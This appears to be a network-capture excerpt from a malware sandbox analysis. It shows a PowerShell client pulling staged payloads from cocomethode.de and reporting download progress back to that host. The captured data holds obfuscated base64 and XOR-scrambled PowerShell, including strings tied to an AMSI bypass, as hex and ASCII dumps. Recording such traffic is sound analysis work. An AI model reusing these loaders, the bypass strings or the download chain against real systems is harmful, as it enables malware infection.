2024-12-11 11:58:29 UTC	1241	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:58:29 GMT Content-Type: application/octet-stream Content-Length: 6427 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ygvra1mXJruDcYHan%2BkcdCaqe%2F1kebYtRPa7aKnC5bapQfFJwHUz%2B05gp1htgFIZNOqLXKycerGrjqvZ3Cbi0aTYnyfyG8Cllz0z5fGgAay7UUMDi4KNc8awJZVgHfx7Zl41L5NH64pK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=47104&min_rtt=1313&rtt_var=7475&sent=13934&recv=5994&lost=0&retrans=8&sent_bytes=19917320&recv_bytes=106855&delivery_rate=47611739&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054d95dbfabcf8-ATL server-timing: cfL4;desc="?proto=TCP&rtt=52&min_rtt=51&rtt_var=21&sent=4&recv=6&lost=0&retrans=0&sent_bytes=981&recv_bytes=1031&delivery_rate=1073491803&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=51&min_rtt=49&rtt_var=23&sent=4&recv=6&lost=0&retrans=0&sent_bytes=1178&recv_bytes=1017&delivery_rate=962985294&cwnd=112&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:58:29 UTC	219	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 37 39 36 26 6d 69 6e 5f 72 74 74 3d 31 31 33 37 30 32 26 72 74 74 5f 76 61 72 3d 32 34 30 39 31 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 36 26 72 65 63 76 5f 62 79 74 65 73 3d 37 37 35 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 36 31 32 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 31 37 35 32 63 63 63 31 65 65 32 36 34 33 64 35 26 74 73 3d 35 39 38 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113796&min_rtt=113702&rtt_var=24091&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=775&delivery_rate=33612&cwnd=251&unsent_bytes=0&cid=1752ccc1ee2643d5&ts=598&x=0"
2024-12-11 11:58:29 UTC	1278	IN	Data Raw: 24 79 66 66 64 79 72 6c 77 6f 77 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 46 6c 74 63 47 78 5a 4d 31 46 6e 54 46 56 57 4e 47 4e 48 52 6e 56 61 52 6b 4a 35 59 6a 4e 43 62 47 4e 75 55 6a 56 4a 52 31 4a 77 59 7a 4e 43 63 31 6c 59 62 45 39 5a 56 7a 46 73 53 31 4e 42 64 47 46 74 4f 58 42 69 61 55 46 70 54 45 4e 4a 63 45 39 35 51 6e 42 61 61 55 46 76 56 7a 4e 4f 4d 47 4e 74 62 48 56 61 4d 54 41 32 54 32 74 73 65 6c 52 75 56 6e 4e 69 52 54 6c 35 55 6c 63 78 64 32 52 49 61 32 39 4b 52 30 56 77 53 31 4e 43 4e 30 6c 44 55 6d 68 4a 52 44 42 6e 53 57 35 57 64 57 45 79 4e 58 5a Data Ascii: $yffdyrlwow=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("UFltcGxZM1FnTFVWNGNHRnVaRkJ5YjNCbGNuUjVJR1JwYzNCc1lYbE9ZVzFsS1NBdGFtOXBiaUFpTENJcE95QnBaaUFvVzNOMGNtbHVaMTA2T2tselRuVnNiRTl5Ulcxd2RIa29KR0VwS1NCN0lDUmhJRDBnSW5WdWEyNXZ
2024-12-11 11:58:29 UTC	1369	IN	Data Raw: 74 4a 61 6e 4e 4f 51 32 6c 4e 5a 31 5a 57 53 6b 31 4a 52 6b 70 73 59 31 68 57 62 47 4d 7a 55 57 64 68 56 7a 56 36 59 56 64 53 62 45 6c 49 55 6e 6c 6c 55 7a 46 71 57 56 68 53 61 6d 46 44 51 6d 6c 69 52 7a 6c 71 59 58 63 77 53 32 52 49 53 6a 56 4a 53 48 4e 4f 51 32 6c 42 5a 30 6c 44 51 55 35 44 61 55 46 6e 53 55 4e 42 61 31 6b 79 4f 58 56 6b 52 31 5a 31 5a 45 4e 42 4f 55 6c 46 62 48 56 6b 62 54 6c 79 57 6c 4d 78 57 46 70 58 53 6c 4e 61 57 45 59 78 57 6c 68 4f 4d 45 6c 44 4d 56 5a 6a 62 57 74 6e 53 6b 68 57 65 57 4a 44 51 58 52 57 57 45 35 73 55 57 31 47 65 6d 46 58 54 6c 46 5a 57 45 70 36 59 56 63 31 62 6b 52 52 63 44 6c 4a 52 30 35 6f 5a 45 64 4f 62 30 6c 49 63 30 35 44 61 55 46 6e 53 55 4e 43 57 47 4e 74 62 44 42 61 55 7a 46 51 5a 46 68 53 64 32 52 59 55 Data Ascii: tJanNOQ2lNZ1ZWSk1JRkpsY1hWbGMzUWdhVzV6YVdSbElIUnllUzFqWVhSamFDQmliRzlqYXcwS2RISjVJSHNOQ2lBZ0lDQU5DaUFnSUNBa1kyOXVkR1Z1ZENBOUlFbHVkbTlyWlMxWFpXSlNaWEYxWlhOMElDMVZjbWtnSkhWeWJDQXRWWE5sUW1GemFXTlFZWEp6YVc1bkRRcDlJR05oZEdOb0lIc05DaUFnSUNCWGNtbDBaUzFQZFhSd2RYU
2024-12-11 11:58:29 UTC	1369	IN	Data Raw: 6b 7a 53 31 52 7a 5a 31 63 77 55 6e 4e 69 52 57 78 30 59 30 63 35 65 57 52 44 5a 32 6c 6b 57 45 35 73 59 32 70 4e 65 55 78 74 55 6e 4e 69 51 30 6c 77 57 46 4e 43 64 32 52 58 53 6e 4e 68 56 30 31 6e 59 7a 4e 53 61 47 52 48 62 47 70 4a 52 31 59 30 5a 45 64 57 65 57 4a 70 51 6b 70 69 62 6c 4a 52 5a 45 68 4a 5a 31 49 79 56 6a 42 53 62 54 6c 35 57 6c 64 6b 65 57 49 7a 56 6e 56 61 52 6d 52 77 59 6d 31 53 64 6d 52 35 5a 33 42 50 65 55 49 35 53 6e 6c 42 64 46 52 48 52 6e 56 61 4d 31 5a 6f 57 6a 4a 56 5a 31 45 78 54 6d 39 5a 57 45 70 33 54 33 6c 43 59 6d 52 74 4f 58 42 61 52 6a 46 69 56 6a 4a 73 64 55 31 36 53 6d 52 50 61 6e 42 55 59 55 63 35 4d 31 59 79 62 48 56 61 52 7a 6b 7a 53 30 5a 30 57 47 46 58 4e 48 70 4e 62 44 41 32 54 32 74 6b 62 47 52 46 57 6e 5a 6a 62 Data Ascii: kzS1RzZ1cwUnNiRWx0Y0c5eWRDZ2lkWE5sY2pNeUxtUnNiQ0lwWFNCd2RXSnNhV01nYzNSaGRHbGpJR1Y0ZEdWeWJpQkpiblJRZEhJZ1IyVjBSbTl5WldkeWIzVnVaRmRwYm1SdmR5Z3BPeUI5SnlBdFRHRnVaM1ZoWjJVZ1ExTm9ZWEp3T3lCYmRtOXBaRjFiVjJsdU16SmRPanBUYUc5M1YybHVaRzkzS0Z0WGFXNHpNbDA2T2tkbGRFWnZjb
2024-12-11 11:58:29 UTC	963	IN	Data Raw: 68 75 62 6b 6a 68 6a 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 22 29 29 3b 0a 24 63 74 61 6e 6f 65 7a 6f 6e 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 56 39 6c 62 6d 46 69 62 47 56 6b 22 29 29 3b 0a 24 62 73 6b 71 79 63 79 64 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 Data Ascii: hubkjhj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));$ctanoezon=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bV9lbmFibGVk"));$bskqycyd=[System.Text.Encoding]::ASCII.GetString([System.Conv
2024-12-11 11:58:29 UTC	1369	IN	Data Raw: 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 58 4e 70 53 57 35 70 64 45 5a 68 61 57 78 6c 5a 41 3d 3d 22 29 29 3b 0a 24 73 75 6a 75 71 67 69 61 6d 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 51 3d 3d 22 29 29 3b 0a 24 73 7a 78 6b 62 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 57 64 Data Ascii: I.GetString([System.Convert]::FromBase64String("bXNpSW5pdEZhaWxlZA=="));$sujuqgiam=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YQ=="));$szxkb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YWd
2024-12-11 11:58:29 UTC	79	IN	Data Raw: 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 28 24 66 69 6d 6c 6b 20 2b 20 24 79 66 66 64 79 72 6c 77 6f 77 29 29 29 29 3b 0a Data Ascii: :ASCII.GetString([System.Convert]::FromBase64String(($fimlk + $yffdyrlwow))));

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:58:30 UTC	369	OUT	GET /file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dcadc494ef7b10813af76bf343da6dd0c11bbafd53f9d40c4534b314e17178a5f9839114b731c4ae608c27f3e23b544cc7edefd58334b3e8215446329673/Windows%20Defender/16/16/user/191 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:58:31 UTC	1289	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:58:31 GMT Content-Type: application/octet-stream Content-Length: 2866 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XrTTW89FwH06eEUqwWjogRGIwjBPNMZY5OGBYvVKOTP4FWZ9%2B5iapURQ7q4FqJ94%2Fd0TuXb9F8M4Zy6Wf7NkxEWlW6PL2LCwneH0SuuXpIEmnjWcI0Fj6%2BbbOnlBU9aPzisvWimvySYS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=29245&min_rtt=1412&rtt_var=24885&sent=16&recv=15&lost=0&retrans=0&sent_bytes=5596&recv_bytes=5725&delivery_rate=78150&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054da3482ab03e-ATL server-timing: cfL4;desc="?proto=TCP&rtt=40&min_rtt=40&rtt_var=20&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=655&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=55&min_rtt=51&rtt_var=21&sent=4&recv=6&lost=0&retrans=0&sent_bytes=7632&recv_bytes=1071&delivery_rate=992166666&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:58:31 UTC	627	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 38 26 6d 69 6e 5f 72 74 74 3d 33 37 26 72 74 74 5f 76 61 72 3d 31 37 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 38 32 32 33 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 32 33 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 37 36 39 38 31 30 38 31 30 26 63 77 6e 64 3d 31 38 37 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 33 38 26 6d Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=48&min_rtt=37&rtt_var=17&sent=5&recv=7&lost=0&retrans=0&sent_bytes=8223&recv_bytes=1023&delivery_rate=1769810810&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=38&m
2024-12-11 11:58:31 UTC	822	IN	Data Raw: 25 6f 64 6c 7b 74 70 73 72 72 6d 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 4f 57 71 59 52 6c 69 51 57 47 5b 70 55 31 53 73 4c 31 34 49 57 6c 71 4f 53 46 72 78 55 6d 65 47 4c 6a 30 37 5b 7b 53 60 53 47 44 78 55 6f 71 42 60 47 71 44 55 55 53 4f 53 47 5b 75 55 30 65 47 4c 47 71 49 52 59 65 60 53 30 5b 72 56 6a 65 52 63 57 71 70 56 6c 79 5b 60 6c 75 34 55 6c 30 56 60 31 30 59 56 6c 79 5b 57 44 34 75 56 6c 71 56 60 54 34 59 52 6c 71 4f 4c 6d 5b 71 55 30 65 5b 4f 57 6d 59 56 55 4b 5b 4c 6a 71 73 55 30 65 53 64 44 38 59 57 59 65 51 57 46 75 34 55 57 53 52 60 6d 6d 54 52 6c 71 Data Ascii: %odl{tpsrrm<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#OWqYRliQWG[pU1SsL14IWlqOSFrxUmeGLj07[{S`SGDxUoqB`GqDUUSOSG[uU0eGLGqIRYe`S0[rVjeRcWqpVly[`lu4Ul0V`10YVly[WD4uVlqV`T4YRlqOLm[qU0e[OWmYVUK[LjqsU0eSdD8YWYeQWFu4UWSR`mmTRlq
2024-12-11 11:58:31 UTC	1369	IN	Data Raw: 69 73 5b 30 43 55 50 56 6d 53 4c 6b 6d 30 5b 44 65 56 65 56 53 45 4c 57 57 6d 56 44 4b 72 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 47 73 5b 46 30 46 62 33 53 59 57 56 65 50 54 31 47 71 56 57 69 42 65 33 4b 49 63 46 71 5b 56 47 4b 76 58 6b 48 31 65 6c 47 74 55 6f 5b 68 60 54 6a 32 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 73 58 54 65 56 60 47 71 49 57 6f 6d 6b 4c 59 4f 73 58 55 4b 56 4f 57 69 55 50 55 6d 4b 50 30 48 78 56 57 65 35 4c 57 71 54 62 31 34 45 60 54 47 6f 52 54 4f 43 60 33 53 58 52 6f 43 4b 53 45 43 6f 52 56 30 6e 4c 46 53 48 50 6f 71 51 60 55 69 33 56 55 48 34 60 6c 48 78 4c 56 79 6a 53 33 69 33 56 6a 65 57 65 57 71 49 57 59 5b 4e 60 6a 44 30 56 57 65 46 63 57 6a 78 53 6c 69 4f 57 46 53 6e 56 57 65 57 4c 47 71 49 55 55 47 4f 57 31 34 72 55 Data Ascii: is[0CUPVmSLkm0[DeVeVSELWWmVDKrRVq{UjOqPVeKP1Gs[F0Fb3SYWVePT1GqVWiBe3KIcFq[VGKvXkH1elGtUo[h`Tj2SGGwUjOqPVeKP1GsXTeV`GqIWomkLYOsXUKVOWiUPUmKP0HxVWe5LWqTb14E`TGoRTOC`3SXRoCKSECoRV0nLFSHPoqQ`Ui3VUH4`lHxLVyjS3i3VjeWeWqIWY[N`jD0VWeFcWjxSliOWFSnVWeWLGqIUUGOW14rU
2024-12-11 11:58:31 UTC	675	IN	Data Raw: 4d 50 30 4b 71 5b 57 69 52 63 47 47 58 52 6f 6d 5b 56 46 75 76 52 30 53 7b 55 6a 4f 6f 60 31 71 5b 63 6a 71 72 56 57 65 7b 4f 31 53 53 63 31 71 6c 54 55 43 4d 50 30 65 4e 60 46 53 49 55 6c 38 44 54 56 38 4a 5b 59 62 76 52 31 4f 53 63 47 53 60 57 7b 57 73 52 54 4f 52 5b 6a 79 73 57 6b 53 5b 4c 6d 5b 32 5b 44 65 72 65 6c 4b 71 4f 54 34 60 56 44 34 37 56 57 65 6a 63 44 38 32 4c 44 75 45 54 56 75 73 56 55 48 34 4c 56 4b 74 54 56 65 4c 57 45 43 6f 55 57 53 7b 55 6a 4f 6f 60 31 71 57 4c 30 4b 6e 58 33 34 53 65 47 54 78 64 46 79 60 56 44 47 6f 55 47 69 4f 5b 31 30 54 57 55 65 44 54 56 38 4a 5b 6d 44 76 52 33 5b 53 4c 44 75 44 54 56 38 4e 50 33 62 38 51 50 3c 3c 23 28 28 3a 0b 25 6e 6d 69 78 62 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c Data Ascii: MP0Kq[WiRcGGXRom[VFuvR0S{UjOo`1q[cjqrVWe{O1SSc1qlTUCMP0eN`FSIUl8DTV8J[YbvR1OScGS`W{WsRTOR[jysWkS[Lm[2[DerelKqOT4`VD47VWejcD82LDuETVusVUH4LVKtTVeLWECoUWS{UjOo`1qWL0KnX34SeGTxdFy`VDGoUGiO[10TWUeDTV8J[mDvR3[SLDuDTV8NP3b8QP<<#((:%nmixb<ZRxrudl/Udyu/Dobnehof\

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:58:31 UTC	285	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba756de8aa750b356ad7104732828f4fb9 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 303
2024-12-11 11:58:31 UTC	303	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 63 6f 63 6f 6d 65 74 68 6f 64 65 2e 64 65 2f 66 69 6c 65 32 2f 31 62 63 61 34 63 37 33 34 62 34 31 37 33 31 38 36 63 65 64 38 33 31 34 31 36 38 34 64 36 39 33 31 63 31 62 33 33 39 63 63 31 36 61 38 63 35 64 63 66 31 34 32 30 30 66 38 34 37 31 32 39 64 31 63 35 37 33 37 66 61 62 38 38 61 65 64 31 65 35 32 34 39 34 37 63 37 64 37 64 61 30 61 34 39 62 37 39 65 62 61 39 35 63 38 39 37 34 65 63 30 39 36 35 61 36 33 38 38 64 34 36 37 30 61 64 33 38 30 35 66 39 61 34 64 62 30 64 65 65 64 64 66 66 36 65 62 39 32 36 65 64 31 66 65 61 33 66 66 35 62 35 62 63 33 65 62 39 66 39 61 66 36 63 62 64 39 64 31 39 65 30 39 39 32 31 34 63 61 32 63 36 39 35 64 32 65 62 63 32 65 Data Ascii: [ "\"begin download https://cocomethode.de/file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fab88aed1e524947c7d7da0a49b79eba95c8974ec0965a6388d4670ad3805f9a4db0deeddff6eb926ed1fea3ff5b5bc3eb9f9af6cbd9d19e099214ca2c695d2ebc2e
2024-12-11 11:58:32 UTC	1191	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:58:32 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XS0c8rsSSEWMbOwORfLsqnUNQ%2FAnq8Kkmu947l%2BusTjZ3tKL8I01gI297JVZnbVgELRPsbNLR8Bbbcrn%2Fg%2FkWziVifb8d34FP%2BTF3AQIl2s16vhIkhqqxs7Hpzxbu2dzze3QeWhey4dS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=32884&min_rtt=1412&rtt_var=31383&sent=25&recv=23&lost=0&retrans=0&sent_bytes=11083&recv_bytes=7957&delivery_rate=2683823&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054daadac17b9a-ATL server-timing: cfL4;desc="?proto=TCP&rtt=53&min_rtt=53&rtt_var=26&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=843&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113953&min_rtt=113923&rtt_var=24079&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1248&delivery_rate=33595&cwnd=243&unsent_bytes=0&cid=5cf6ea7c265be920&ts=849&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:58:33 UTC	365	OUT	GET /file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fab88aed1e524947c7d7da0a49b79eba95c8974ec0965a6388d4670ad3805f9a4db0deeddff6eb926ed1fea3ff5b5bc3eb9f9af6cbd9d19e099214ca2c695d2ebc2eecb14e0349f34ea28f5372e HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:58:33 UTC	1309	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:58:33 GMT Content-Type: application/octet-stream Content-Length: 2864 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCl%2B%2Bf1DyQJpKwkJF3lkrXudnx2K2AFmFI9DFsjz6wRrIcZK6cuKBYRMVDDKIu%2BF9NdLly1ILz71w%2Ff3e9SfY%2BvmxZNQjF6BDV1JxBwUb4CO1SZRsWYVVAm3AuYRS%2BpBNVhW7wo8b0rr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=42043&min_rtt=1485&rtt_var=27250&sent=21&recv=21&lost=0&retrans=0&sent_bytes=8532&recv_bytes=7123&delivery_rate=54010&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054db1df86bfb6-ATL server-timing: cfL4;desc="?proto=TCP&rtt=53&min_rtt=51&rtt_var=14&sent=7&recv=9&lost=0&retrans=0&sent_bytes=8447&recv_bytes=1658&delivery_rate=1235528301&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=53&min_rtt=49&rtt_var=17&sent=7&recv=9&lost=0&retrans=0&sent_bytes=8853&recv_bytes=1637&delivery_rate=1073491803&cwnd=114&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:58:33 UTC	220	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 38 35 38 26 6d 69 6e 5f 72 74 74 3d 31 31 33 38 31 36 26 72 74 74 5f 76 61 72 3d 32 34 30 37 39 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 34 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 30 33 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 36 30 32 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 61 36 30 34 35 65 64 66 30 66 66 65 37 34 63 63 26 74 73 3d 35 39 37 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113858&min_rtt=113816&rtt_var=24079&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1003&delivery_rate=33602&cwnd=252&unsent_bytes=0&cid=a6045edf0ffe74cc&ts=597&x=0"
2024-12-11 11:58:33 UTC	1209	IN	Data Raw: 25 63 78 68 70 6c 71 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 57 46 75 35 55 57 65 47 64 44 30 37 55 55 47 51 57 31 5b 73 55 31 53 57 64 57 6d 54 5b 32 65 51 57 31 6a 7b 55 56 30 4f 64 6d 6d 54 56 59 69 5b 64 6c 79 73 55 59 71 4f 65 31 30 37 50 6c 6d 60 60 6a 4b 72 55 6a 53 47 64 6a 30 44 58 32 65 51 53 30 4b 71 56 6d 53 4e 63 47 71 54 53 6c 30 5b 4c 6d 44 31 55 6d 53 43 4f 44 30 75 54 59 69 4e 57 30 5b 6e 55 6b 4b 4f 65 31 30 70 5b 46 6d 4e 53 46 4c 76 55 30 65 46 63 47 6d 54 5b 7b 53 4e 60 6c 53 72 55 55 4b 57 64 54 34 44 5b 46 6d 60 53 47 6a 76 55 31 65 53 64 54 34 Data Ascii: %cxhplq<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#WFu5UWeGdD07UUGQW1[sU1SWdWmT[2eQW1j{UV0OdmmTVYi[dlysUYqOe107Plm``jKrUjSGdj0DX2eQS0KqVmSNcGqTSl0[LmD1UmSCOD0uTYiNW0[nUkKOe10p[FmNSFLvU0eFcGmT[{SN`lSrUUKWdT4D[Fm`SGjvU1eSdT4
